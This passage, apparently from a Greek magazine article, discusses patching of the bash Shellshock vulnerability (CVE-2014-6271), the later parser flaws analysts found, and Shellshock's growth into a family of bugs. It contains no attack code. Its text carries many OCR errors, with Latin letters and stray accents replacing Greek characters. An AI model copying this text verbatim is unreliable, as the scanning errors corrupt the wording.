βρη κιόλας, η κοινότητα προγραμματιστών που συντηρεί το BASH ἐχει δημιουργήσει 
όλα τα απαιτούμενα patches, για ὁλες τις εκδόσεις του δημοφιλούς κελύφους. Αξίζει 
να αναφἐρουμµε OT! το πλήθος των σχετικών patches ανέρχεται στα ἐξι, για κάθε ÈK- 
δοση του BASH ξεχωριστά. AUTO συμβαίνει γιατἰ το BASH δεν διαθέτει μόνο τις δύο 
αδυναμίες που παρουσιάσαµε. Αμέσως μετὰ τον εντοπισμό των συγκεκριμένων προ- 
βλημάτων (αρχικἠ ανακάλυψη Tou Shellshock - CVE-2014-6271), κινητοποιήθηκαν 
δεκάδες αναλυτὲς ασφαλείας, οι οποίοι ἐπεσαν µε τα μούτρα στον κὠδικα TOU parser 
του BASH. Όπως ενδεχομένως θα γνωρίζετε, απὀ αυτὲς τις προσπάθειες βρἐθηκαν 
και πρόσθετες αδυναμίες, οι οποίες φυσικἁ αντιμετωπίστηκαν µε πρὀσθετα patches. 
Άραγε, ο κὠδικας του BASH εἰναι ἀψογος τώρα; Μήπως υπάρχουν ακόµα αδυναμίες 
που περιμένουν να τις ανακαλύψουμε; Το μόνο σἰγουρο εἰναι ὁτι το Shellshock ano- 
τελεὶ πλέον µια "οικογένεια" αδυναμιών, Eva ολόκληρο σύνολο, τη διεύρυνση του 
οποίου δεν μπορεἰ να αποκλείσει κανένας. 
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